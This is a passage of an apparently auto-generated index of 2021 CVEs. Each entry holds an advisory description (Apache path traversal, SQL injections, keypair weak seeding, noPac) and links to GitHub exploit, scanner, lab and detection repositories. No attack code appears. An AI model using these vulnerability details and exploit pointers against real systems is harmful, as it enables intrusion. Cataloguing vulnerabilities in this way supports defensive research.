- [UncleJ4ck/CVE-2021-41091](https://github.com/UncleJ4ck/CVE-2021-41091)
- [jrbH4CK/CVE-2021-41091](https://github.com/jrbH4CK/CVE-2021-41091)
- [SNE-M23-SN/Vulnerable-Docker-Engine](https://github.com/SNE-M23-SN/Vulnerable-Docker-Engine)
### CVE-2021-41117 (2021-10-11)
keypair is a a RSA PEM key generator written in javascript. keypair implements a lot of cryptographic primitives on its own or by borrowing from other libraries where possible, including node-forge. An issue was discovered where this library was generating identical RSA keys used in SSH. This would mean that the library is generating identical P, Q (and thus N) values which, in practical terms, is impossible with RSA-2048 keys. Generating identical values, repeatedly, usually indicates an issue with poor random number generation, or, poor handling of CSPRNG output. Issue 1: Poor random number generation (`GHSL-2021-1012`). The library does not rely entirely on a platform provided CSPRNG, rather, it uses it's own counter-based CMAC approach. Where things go wrong is seeding the CMAC implementation with "true" random data in the function `defaultSeedFile`. In order to seed the AES-CMAC generator, the library will take two different approaches depending on the JavaScript execution environment. In a browser, the library will use [`window.crypto.getRandomValues()`](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L971). However, in a nodeJS execution environment, the `window` object is not defined, so it goes down a much less secure solution, also of which has a bug in it. It does look like the library tries to use node's CSPRNG when possible unfortunately, it looks like the `crypto` object is null because a variable was declared with the same name, and set to `null`. So the node CSPRNG path is never taken. However, when `window.crypto.getRandomValues()` is not available, a Lehmer LCG random number generator is used to seed the CMAC counter, and the LCG is seeded with `Math.random`. While this is poor and would likely qualify in a security bug in itself, it does not explain the extreme frequency in which duplicate keys occur. The main flaw: The output from the Lehmer LCG is encoded incorrectly. The specific [line][https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L1008] with the flaw is: `b.putByte(String.fromCharCode(next & 0xFF))` The [definition](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L350-L352) of `putByte` is `util.ByteBuffer.prototype.putByte = function(b) {this.data += String.fromCharCode(b);};`. Simplified, this is `String.fromCharCode(String.fromCharCode(next & 0xFF))`. The double `String.fromCharCode` is almost certainly unintentional and the source of weak seeding. Unfortunately, this does not result in an error. Rather, it results most of the buffer containing zeros. Since we are masking with 0xFF, we can determine that 97% of the output from the LCG are converted to zeros. The only outputs that result in meaningful values are outputs 48 through 57, inclusive. The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9. In summary, there are three immediate concerns: 1. The library has an insecure random number fallback path. Ideally the library would require a strong CSPRNG instead of attempting to use a LCG and `Math.random`. 2. The library does not correctly use a strong random number generator when run in NodeJS, even though a strong CSPRNG is available. 3. The fallback path has an issue in the implementation where a majority of the seed data is going to effectively be zero. Due to the poor random number generation, keypair generates RSA keys that are relatively easy to guess. This could enable an attacker to decrypt confidential messages or gain authorized access to an account belonging to the victim.
- [badkeys/keypairvuln](https://github.com/badkeys/keypairvuln)
### CVE-2021-41160 (2021-10-21)
FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a malicious server might trigger out of bound writes in a connected client. Connections using GDI or SurfaceCommands to send graphics updates to the client might send `0` width/height or out of bound rectangles to trigger out of bound writes. With `0` width or heigth the memory allocation will be `0` but the missing bounds checks allow writing to the pointer at this (not allocated) region. This issue has been patched in FreeRDP 2.4.1.
- [Jajangjaman/CVE-2021-41160](https://github.com/Jajangjaman/CVE-2021-41160)
### CVE-2021-41182 (2021-10-26)
jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `altField` option of the Datepicker widget from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `altField` option is now treated as a CSS selector. A workaround is to not accept the value of the `altField` option from untrusted sources.
- [aredspy/CVE-2021-41182](https://github.com/aredspy/CVE-2021-41182)
- [aredspy/CVE-2021-41182-Tester](https://github.com/aredspy/CVE-2021-41182-Tester)
### CVE-2021-41184 (2021-10-26)
jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `of` option of the `.position()` util from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `of` option is now treated as a CSS selector. A workaround is to not accept the value of the `of` option from untrusted sources.
- [gabrielolivra/Exploit-Medium-CVE-2021-41184](https://github.com/gabrielolivra/Exploit-Medium-CVE-2021-41184)
### CVE-2021-41277 (2021-11-17)
Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
- [Seals6/CVE-2021-41277](https://github.com/Seals6/CVE-2021-41277)
- [tahtaciburak/CVE-2021-41277](https://github.com/tahtaciburak/CVE-2021-41277)
- [Henry4E36/Metabase-cve-2021-41277](https://github.com/Henry4E36/Metabase-cve-2021-41277)
- [kap1ush0n/CVE-2021-41277](https://github.com/kap1ush0n/CVE-2021-41277)
- [z3n70/CVE-2021-41277](https://github.com/z3n70/CVE-2021-41277)
- [kaizensecurity/CVE-2021-41277](https://github.com/kaizensecurity/CVE-2021-41277)
- [Vulnmachines/Metabase_CVE-2021-41277](https://github.com/Vulnmachines/Metabase_CVE-2021-41277)
- [TheLastVvV/CVE-2021-41277](https://github.com/TheLastVvV/CVE-2021-41277)
- [zer0yu/CVE-2021-41277](https://github.com/zer0yu/CVE-2021-41277)
- [sasukeourad/CVE-2021-41277_SSRF](https://github.com/sasukeourad/CVE-2021-41277_SSRF)
- [frknktlca/Metabase_Nmap_Script](https://github.com/frknktlca/Metabase_Nmap_Script)
- [chengling-ing/CVE-2021-41277](https://github.com/chengling-ing/CVE-2021-41277)
- [RubXkuB/PoC-Metabase-CVE-2021-41277](https://github.com/RubXkuB/PoC-Metabase-CVE-2021-41277)
### CVE-2021-41338 (2021-10-13)
Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability
- [Mario-Kart-Felix/firewall-cve](https://github.com/Mario-Kart-Felix/firewall-cve)
### CVE-2021-41349 (2021-11-10)
Microsoft Exchange Server Spoofing Vulnerability
- [0xrobiul/CVE-2021-41349](https://github.com/0xrobiul/CVE-2021-41349)
### CVE-2021-41351 (2021-11-10)
Microsoft Edge (Chrome based) Spoofing on IE Mode
- [JaneMandy/CVE-2021-41351-POC](https://github.com/JaneMandy/CVE-2021-41351-POC)
### CVE-2021-41381 (2021-09-23)
Payara Micro Community 5.2021.6 and below allows Directory Traversal.
- [Net-hunter121/CVE-2021-41381](https://github.com/Net-hunter121/CVE-2021-41381)
### CVE-2021-41511 (2021-10-04)
The username and password field of login in Lodging Reservation Management System V1 can give access to any user by using SQL injection to bypass authentication.
- [vidvansh/CVE-2021-41511](https://github.com/vidvansh/CVE-2021-41511)
### CVE-2021-41560 (2021-12-15)
OpenCATS through 0.9.6 allows remote attackers to execute arbitrary code by uploading an executable file via lib/FileUtility.php.
- [Nickguitar/RevCAT](https://github.com/Nickguitar/RevCAT)
### CVE-2021-41643 (2021-10-29)
Remote Code Execution (RCE) vulnerability exists in Sourcecodester Church Management System 1.0 via the image upload field.
- [hax3xploit/CVE-2021-41643](https://github.com/hax3xploit/CVE-2021-41643)
### CVE-2021-41644 (2021-10-29)
Remote Code Exection (RCE) vulnerability exists in Sourcecodester Online Food Ordering System 2.0 via a maliciously crafted PHP file that bypasses the image upload filters.
- [hax3xploit/CVE-2021-41644](https://github.com/hax3xploit/CVE-2021-41644)
### CVE-2021-41645 (2021-10-29)
Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. .
- [hax3xploit/CVE-2021-41645](https://github.com/hax3xploit/CVE-2021-41645)
### CVE-2021-41646 (2021-10-29)
Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters..
- [hax3xploit/CVE-2021-41646](https://github.com/hax3xploit/CVE-2021-41646)
### CVE-2021-41647 (2021-10-01)
An un-authenticated error-based and time-based blind SQL injection vulnerability exists in Kaushik Jadhav Online Food Ordering Web App 1.0. An attacker can exploit the vulnerable "username" parameter in login.php and retrieve sensitive database information, as well as add an administrative user.
- [MobiusBinary/CVE-2021-41647](https://github.com/MobiusBinary/CVE-2021-41647)
### CVE-2021-41648 (2021-10-01)
An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
- [MobiusBinary/CVE-2021-41648](https://github.com/MobiusBinary/CVE-2021-41648)
### CVE-2021-41649 (2021-10-01)
An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
- [MobiusBinary/CVE-2021-41649](https://github.com/MobiusBinary/CVE-2021-41649)
### CVE-2021-41651 (2021-10-04)
A blind SQL injection vulnerability exists in the Raymart DG / Ahmed Helal Hotel-mgmt-system. A malicious attacker can retrieve sensitive database information and interact with the database using the vulnerable cid parameter in process_update_profile.php.
- [MobiusBinary/CVE-2021-41651](https://github.com/MobiusBinary/CVE-2021-41651)
### CVE-2021-41653 (2021-11-13)
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
- [likeww/CVE-2021-41653](https://github.com/likeww/CVE-2021-41653)
### CVE-2021-41730
- [yezeting/CVE-2021-41730](https://github.com/yezeting/CVE-2021-41730)
### CVE-2021-41773 (2021-10-05)
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.
- [Vulnmachines/cve-2021-41773](https://github.com/Vulnmachines/cve-2021-41773)
- [numanturle/CVE-2021-41773](https://github.com/numanturle/CVE-2021-41773)
- [knqyf263/CVE-2021-41773](https://github.com/knqyf263/CVE-2021-41773)
- [ZephrFish/CVE-2021-41773-PoC](https://github.com/ZephrFish/CVE-2021-41773-PoC)
- [iilegacyyii/PoC-CVE-2021-41773](https://github.com/iilegacyyii/PoC-CVE-2021-41773)
- [masahiro331/CVE-2021-41773](https://github.com/masahiro331/CVE-2021-41773)
- [j4k0m/CVE-2021-41773](https://github.com/j4k0m/CVE-2021-41773)
- [TishcaTpx/POC-CVE-2021-41773](https://github.com/TishcaTpx/POC-CVE-2021-41773)
- [lorddemon/CVE-2021-41773-PoC](https://github.com/lorddemon/CVE-2021-41773-PoC)
- [Ls4ss/CVE-2021-41773_CVE-2021-42013](https://github.com/Ls4ss/CVE-2021-41773_CVE-2021-42013)
- [itsecurityco/CVE-2021-41773](https://github.com/itsecurityco/CVE-2021-41773)
- [habibiefaried/CVE-2021-41773-PoC](https://github.com/habibiefaried/CVE-2021-41773-PoC)
- [creadpag/CVE-2021-41773-POC](https://github.com/creadpag/CVE-2021-41773-POC)
- [TAI-REx/cve-2021-41773-nse](https://github.com/TAI-REx/cve-2021-41773-nse)
- [blasty/CVE-2021-41773](https://github.com/blasty/CVE-2021-41773)
- [PentesterGuruji/CVE-2021-41773](https://github.com/PentesterGuruji/CVE-2021-41773)
- [jbovet/CVE-2021-41773](https://github.com/jbovet/CVE-2021-41773)
- [mohwahyudi/cve-2021-41773](https://github.com/mohwahyudi/cve-2021-41773)
- [1nhann/CVE-2021-41773](https://github.com/1nhann/CVE-2021-41773)
- [ranggaggngntt/CVE-2021-41773](https://github.com/ranggaggngntt/CVE-2021-41773)
- [BlueTeamSteve/CVE-2021-41773](https://github.com/BlueTeamSteve/CVE-2021-41773)
- [Zeop-CyberSec/apache_normalize_path](https://github.com/Zeop-CyberSec/apache_normalize_path)
- [r00tVen0m/CVE-2021-41773](https://github.com/r00tVen0m/CVE-2021-41773)
- [n3k00n3/CVE-2021-41773](https://github.com/n3k00n3/CVE-2021-41773)
- [fnatalucci/CVE-2021-41773-RCE](https://github.com/fnatalucci/CVE-2021-41773-RCE)
- [AssassinUKG/CVE-2021-41773](https://github.com/AssassinUKG/CVE-2021-41773)
- [jheeree/Simple-CVE-2021-41773-checker](https://github.com/jheeree/Simple-CVE-2021-41773-checker)
- [orangmuda/CVE-2021-41773](https://github.com/orangmuda/CVE-2021-41773)
- [HightechSec/scarce-apache2](https://github.com/HightechSec/scarce-apache2)
- [vinhjaxt/CVE-2021-41773-exploit](https://github.com/vinhjaxt/CVE-2021-41773-exploit)
- [sixpacksecurity/CVE-2021-41773](https://github.com/sixpacksecurity/CVE-2021-41773)
- [Hattan515/POC-CVE-2021-41773](https://github.com/Hattan515/POC-CVE-2021-41773)
- [twseptian/cve-2021-41773](https://github.com/twseptian/cve-2021-41773)
- [noflowpls/CVE-2021-41773](https://github.com/noflowpls/CVE-2021-41773)
- [McSl0vv/CVE-2021-41773](https://github.com/McSl0vv/CVE-2021-41773)
- [shiomiyan/CVE-2021-41773](https://github.com/shiomiyan/CVE-2021-41773)
- [justakazh/mass_cve-2021-41773](https://github.com/justakazh/mass_cve-2021-41773)
- [Sakura-nee/CVE-2021-41773](https://github.com/Sakura-nee/CVE-2021-41773)
- [shellreaper/CVE-2021-41773](https://github.com/shellreaper/CVE-2021-41773)
- [0xRar/CVE-2021-41773](https://github.com/0xRar/CVE-2021-41773)
- [pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt)
- [corelight/CVE-2021-41773](https://github.com/corelight/CVE-2021-41773)
- [zeronine9/CVE-2021-41773](https://github.com/zeronine9/CVE-2021-41773)
- [b1tsec/CVE-2021-41773](https://github.com/b1tsec/CVE-2021-41773)
- [superzerosec/CVE-2021-41773](https://github.com/superzerosec/CVE-2021-41773)
- [im-hanzou/apachrot](https://github.com/im-hanzou/apachrot)
- [inbug-team/CVE-2021-41773_CVE-2021-42013](https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013)
- [5gstudent/cve-2021-41773-and-cve-2021-42013](https://github.com/5gstudent/cve-2021-41773-and-cve-2021-42013)
- [EagleTube/CVE-2021-41773](https://github.com/EagleTube/CVE-2021-41773)
- [apapedulimu/Apachuk](https://github.com/apapedulimu/Apachuk)
- [scarmandef/CVE-2021-41773](https://github.com/scarmandef/CVE-2021-41773)
- [ksanchezcld/httpd-2.4.49](https://github.com/ksanchezcld/httpd-2.4.49)
- [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal)
- [theLSA/apache-httpd-path-traversal-checker](https://github.com/theLSA/apache-httpd-path-traversal-checker)
- [LudovicPatho/CVE-2021-41773](https://github.com/LudovicPatho/CVE-2021-41773)
- [lopqto/CVE-2021-41773_Honeypot](https://github.com/lopqto/CVE-2021-41773_Honeypot)
- [zerodaywolf/CVE-2021-41773_42013](https://github.com/zerodaywolf/CVE-2021-41773_42013)
- [LayarKacaSiber/CVE-2021-41773](https://github.com/LayarKacaSiber/CVE-2021-41773)
- [BabyTeam1024/CVE-2021-41773](https://github.com/BabyTeam1024/CVE-2021-41773)
- [walnutsecurity/cve-2021-41773](https://github.com/walnutsecurity/cve-2021-41773)
- [TheLastVvV/CVE-2021-41773](https://github.com/TheLastVvV/CVE-2021-41773)
- [MazX0p/CVE-2021-41773](https://github.com/MazX0p/CVE-2021-41773)
- [vida003/Scanner-CVE-2021-41773](https://github.com/vida003/Scanner-CVE-2021-41773)
- [mr-exo/CVE-2021-41773](https://github.com/mr-exo/CVE-2021-41773)
- [wolf1892/CVE-2021-41773](https://github.com/wolf1892/CVE-2021-41773)
- [Hydragyrum/CVE-2021-41773-Playground](https://github.com/Hydragyrum/CVE-2021-41773-Playground)
- [IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit](https://github.com/IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit)
- [pirenga/CVE-2021-41773](https://github.com/pirenga/CVE-2021-41773)
- [kubota/POC-CVE-2021-41773](https://github.com/kubota/POC-CVE-2021-41773)
- [xMohamed0/CVE-2021-41773](https://github.com/xMohamed0/CVE-2021-41773)
- [i6c/MASS_CVE-2021-41773](https://github.com/i6c/MASS_CVE-2021-41773)
- [norrig/CVE-2021-41773-exploiter](https://github.com/norrig/CVE-2021-41773-exploiter)
- [m96dg/CVE-2021-41773-exercise](https://github.com/m96dg/CVE-2021-41773-exercise)
- [skentagon/CVE-2021-41773](https://github.com/skentagon/CVE-2021-41773)
- [mauricelambert/CVE-2021-41773](https://github.com/mauricelambert/CVE-2021-41773)
- [the29a/CVE-2021-41773](https://github.com/the29a/CVE-2021-41773)
- [thehackersbrain/CVE-2021-41773](https://github.com/thehackersbrain/CVE-2021-41773)
- [honypot/CVE-2021-41773](https://github.com/honypot/CVE-2021-41773)
- [Fa1c0n35/CVE-2021-41773](https://github.com/Fa1c0n35/CVE-2021-41773)
- [puckiestyle/CVE-2021-41773](https://github.com/puckiestyle/CVE-2021-41773)
- [zer0qs/CVE-2021-41773](https://github.com/zer0qs/CVE-2021-41773)
- [DoTuan1/Reserch-CVE-2021-41773](https://github.com/DoTuan1/Reserch-CVE-2021-41773)
- [bernardas/netsec-polygon](https://github.com/bernardas/netsec-polygon)
- [CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit)
- [vuongnv3389-sec/cve-2021-41773](https://github.com/vuongnv3389-sec/cve-2021-41773)
- [Chocapikk/CVE-2021-41773](https://github.com/Chocapikk/CVE-2021-41773)
- [wangfly-me/Apache_Penetration_Tool](https://github.com/wangfly-me/Apache_Penetration_Tool)
- [anldori/CVE-2021-41773-Scanner](https://github.com/anldori/CVE-2021-41773-Scanner)
- [iosifache/ApacheRCEEssay](https://github.com/iosifache/ApacheRCEEssay)
- [Habib0x0/CVE-2021-41773](https://github.com/Habib0x0/CVE-2021-41773)
- [pwn3z/CVE-2021-41773-Apache-RCE](https://github.com/pwn3z/CVE-2021-41773-Apache-RCE)
- [EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-](https://github.com/EkamSinghWalia/Mitigation-Apache-CVE-2021-41773-)
- [Plunder283/CVE-2021-41773](https://github.com/Plunder283/CVE-2021-41773)
- [mightysai1997/cve-2021-41773](https://github.com/mightysai1997/cve-2021-41773)
- [mightysai1997/CVE-2021-41773h](https://github.com/mightysai1997/CVE-2021-41773h)
- [mightysai1997/cve-2021-41773-v-](https://github.com/mightysai1997/cve-2021-41773-v-)
- [mightysai1997/CVE-2021-41773-i-](https://github.com/mightysai1997/CVE-2021-41773-i-)
- [mightysai1997/CVE-2021-41773-L-](https://github.com/mightysai1997/CVE-2021-41773-L-)
- [mightysai1997/CVE-2021-41773-PoC](https://github.com/mightysai1997/CVE-2021-41773-PoC)
- [mightysai1997/CVE-2021-41773.git1](https://github.com/mightysai1997/CVE-2021-41773.git1)
- [mightysai1997/CVE-2021-41773m](https://github.com/mightysai1997/CVE-2021-41773m)
- [mightysai1997/CVE-2021-41773S](https://github.com/mightysai1997/CVE-2021-41773S)
- [dileepdkumar/LayarKacaSiber-CVE-2021-41773](https://github.com/dileepdkumar/LayarKacaSiber-CVE-2021-41773)
- [aqiao-jashell/CVE-2021-41773](https://github.com/aqiao-jashell/CVE-2021-41773)
- [aqiao-jashell/py-CVE-2021-41773](https://github.com/aqiao-jashell/py-CVE-2021-41773)
- [12345qwert123456/CVE-2021-41773](https://github.com/12345qwert123456/CVE-2021-41773)
- [blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution](https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution)
- [TheKernelPanic/exploit-apache2-cve-2021-41773](https://github.com/TheKernelPanic/exploit-apache2-cve-2021-41773)
- [retrymp3/apache2.4.49VulnerableLabSetup](https://github.com/retrymp3/apache2.4.49VulnerableLabSetup)
- [MatanelGordon/docker-cve-2021-41773](https://github.com/MatanelGordon/docker-cve-2021-41773)
- [0xGabe/Apache-CVEs](https://github.com/0xGabe/Apache-CVEs)
- [OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits](https://github.com/OfriOuzan/CVE-2021-41773_CVE-2021-42013_Exploits)
- [belajarqywok/CVE-2021-41773-MSF](https://github.com/belajarqywok/CVE-2021-41773-MSF)
- [Iris288/CVE-2021-41773](https://github.com/Iris288/CVE-2021-41773)
- [Maybe4a6f7365/CVE-2021-41773](https://github.com/Maybe4a6f7365/CVE-2021-41773)
- [Zyx2440/Apache-HTTP-Server-2.4.50-RCE](https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE)
- [0xc4t/CVE-2021-41773](https://github.com/0xc4t/CVE-2021-41773)
- [jkska23/Additive-Vulnerability-Analysis-CVE-2021-41773](https://github.com/jkska23/Additive-Vulnerability-Analysis-CVE-2021-41773)
### CVE-2021-41784 (2022-08-29)
Foxit PDF Reader before 11.1 and PDF Editor before 11.1, and PhantomPDF before 10.1.6, allow attackers to trigger a use-after-free and execute arbitrary code because JavaScript is mishandled.
- [Jeromeyoung/CVE-2021-41784](https://github.com/Jeromeyoung/CVE-2021-41784)
### CVE-2021-41805 (2021-12-12)
HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4 has Incorrect Access Control. An ACL token (with the default operator:write permissions) in one namespace can be used for unintended privilege escalation in a different namespace.
- [blackm4c/CVE-2021-41805](https://github.com/blackm4c/CVE-2021-41805)
### CVE-2021-41822
- [badboycxcc/CVE-2021-41822](https://github.com/badboycxcc/CVE-2021-41822)
### CVE-2021-41946 (2022-05-18)
In FiberHome VDSL2 Modem HG150-Ub_V3.0, a stored cross-site scripting (XSS) vulnerability in Parental Control --> Access Time Restriction --> Username field, a user cannot delete the rule due to the XSS.
- [afaq1337/CVE-2021-41946](https://github.com/afaq1337/CVE-2021-41946)
### CVE-2021-41962 (2021-12-16)
Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Owner fullname parameter in a Send Service Request in vehicle_service.
- [lohyt/-CVE-2021-41962](https://github.com/lohyt/-CVE-2021-41962)
### CVE-2021-42008 (2021-10-04)
The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access.
- [numanturle/CVE-2021-42008](https://github.com/numanturle/CVE-2021-42008)
- [0xdevil/CVE-2021-42008](https://github.com/0xdevil/CVE-2021-42008)
### CVE-2021-42013 (2021-10-07)
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.
- [andrea-mattioli/apache-exploit-CVE-2021-42013](https://github.com/andrea-mattioli/apache-exploit-CVE-2021-42013)
- [Vulnmachines/cve-2021-42013](https://github.com/Vulnmachines/cve-2021-42013)
- [twseptian/cve-2021-42013-docker-lab](https://github.com/twseptian/cve-2021-42013-docker-lab)
- [LayarKacaSiber/CVE-2021-42013](https://github.com/LayarKacaSiber/CVE-2021-42013)
- [TheLastVvV/CVE-2021-42013](https://github.com/TheLastVvV/CVE-2021-42013)
- [TheLastVvV/CVE-2021-42013_Reverse-Shell](https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell)
- [walnutsecurity/cve-2021-42013](https://github.com/walnutsecurity/cve-2021-42013)
- [robotsense1337/CVE-2021-42013](https://github.com/robotsense1337/CVE-2021-42013)
- [xMohamed0/CVE-2021-42013-ApacheRCE](https://github.com/xMohamed0/CVE-2021-42013-ApacheRCE)
- [asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp](https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp)
- [jas9reet/CVE-2021-42013-LAB](https://github.com/jas9reet/CVE-2021-42013-LAB)
- [mauricelambert/CVE-2021-42013](https://github.com/mauricelambert/CVE-2021-42013)
- [honypot/CVE-2021-42013](https://github.com/honypot/CVE-2021-42013)
- [hadrian3689/apache_2.4.50](https://github.com/hadrian3689/apache_2.4.50)
- [viliuspovilaika/cve-2021-42013](https://github.com/viliuspovilaika/cve-2021-42013)
- [mightysai1997/cve-2021-42013](https://github.com/mightysai1997/cve-2021-42013)
- [mightysai1997/cve-2021-42013L](https://github.com/mightysai1997/cve-2021-42013L)
- [mightysai1997/cve-2021-42013.get](https://github.com/mightysai1997/cve-2021-42013.get)
- [12345qwert123456/CVE-2021-42013](https://github.com/12345qwert123456/CVE-2021-42013)
- [cybfar/cve-2021-42013-httpd](https://github.com/cybfar/cve-2021-42013-httpd)
- [vudala/CVE-2021-42013](https://github.com/vudala/CVE-2021-42013)
- [Hamesawian/CVE-2021-42013](https://github.com/Hamesawian/CVE-2021-42013)
- [K3ysTr0K3R/CVE-2021-42013-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-42013-EXPLOIT)
- [BassoNicolas/CVE-2021-42013](https://github.com/BassoNicolas/CVE-2021-42013)
- [rafifdna/CVE-2021-42013](https://github.com/rafifdna/CVE-2021-42013)
- [dream434/cve-2021-42013-apache](https://github.com/dream434/cve-2021-42013-apache)
- [bananoname/cve-2021-42013](https://github.com/bananoname/cve-2021-42013)
### CVE-2021-42056 (2022-06-24)
Thales Safenet Authentication Client (SAC) for Linux and Windows through 10.7.7 creates insecure temporary hid and lock files allowing a local attacker, through a symlink attack, to overwrite arbitrary files, and potentially achieve arbitrary command execution with high privileges.
- [z00z00z00/Safenet_SAC_CVE-2021-42056](https://github.com/z00z00z00/Safenet_SAC_CVE-2021-42056)
### CVE-2021-42063 (2021-12-14)
A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data.
- [Cappricio-Securities/CVE-2021-42063](https://github.com/Cappricio-Securities/CVE-2021-42063)
### CVE-2021-42071 (2021-10-07)
In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.
- [adubaldo/CVE-2021-42071](https://github.com/adubaldo/CVE-2021-42071)
### CVE-2021-42171 (2022-03-14)
Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.
- [minhnq22/CVE-2021-42171](https://github.com/minhnq22/CVE-2021-42171)
### CVE-2021-42183 (2022-05-05)
MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/.
- [0xRaw/CVE-2021-42183](https://github.com/0xRaw/CVE-2021-42183)
### CVE-2021-42205 (2022-11-07)
ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice.
- [gmh5225/CVE-2021-42205](https://github.com/gmh5225/CVE-2021-42205)
### CVE-2021-42230 (2022-04-15)
Seowon 130-SLC router all versions as of 2021-09-15 is vulnerable to Remote Code Execution via the queriesCnt parameter.
- [TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated)
### CVE-2021-42237 (2021-11-05)
Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
- [ItsIgnacioPortal/CVE-2021-42237](https://github.com/ItsIgnacioPortal/CVE-2021-42237)
- [vesperp/CVE-2021-42237-SiteCore-XP](https://github.com/vesperp/CVE-2021-42237-SiteCore-XP)
- [crankyyash/SiteCore-RCE-Detection](https://github.com/crankyyash/SiteCore-RCE-Detection)
### CVE-2021-42261 (2021-10-19)
Revisor Video Management System (VMS) before 2.0.0 has a directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of restricted directory on the remote server. This could lead to the disclosure of sensitive data on the vulnerable server.
- [jet-pentest/CVE-2021-42261](https://github.com/jet-pentest/CVE-2021-42261)
### CVE-2021-42278 (2021-11-10)
Active Directory Domain Services Elevation of Privilege Vulnerability
- [safebuffer/sam-the-admin](https://github.com/safebuffer/sam-the-admin)
- [Ridter/noPac](https://github.com/Ridter/noPac)
- [waterrr/noPac](https://github.com/waterrr/noPac)
- [ly4k/Pachine](https://github.com/ly4k/Pachine)
- [cybersecurityworks553/noPac-detection](https://github.com/cybersecurityworks553/noPac-detection)
### CVE-2021-42287 (2021-11-10)
Active Directory Domain Services Elevation of Privilege Vulnerability
- [cube0x0/noPac](https://github.com/cube0x0/noPac)
- [ricardojba/Invoke-noPac](https://github.com/ricardojba/Invoke-noPac)
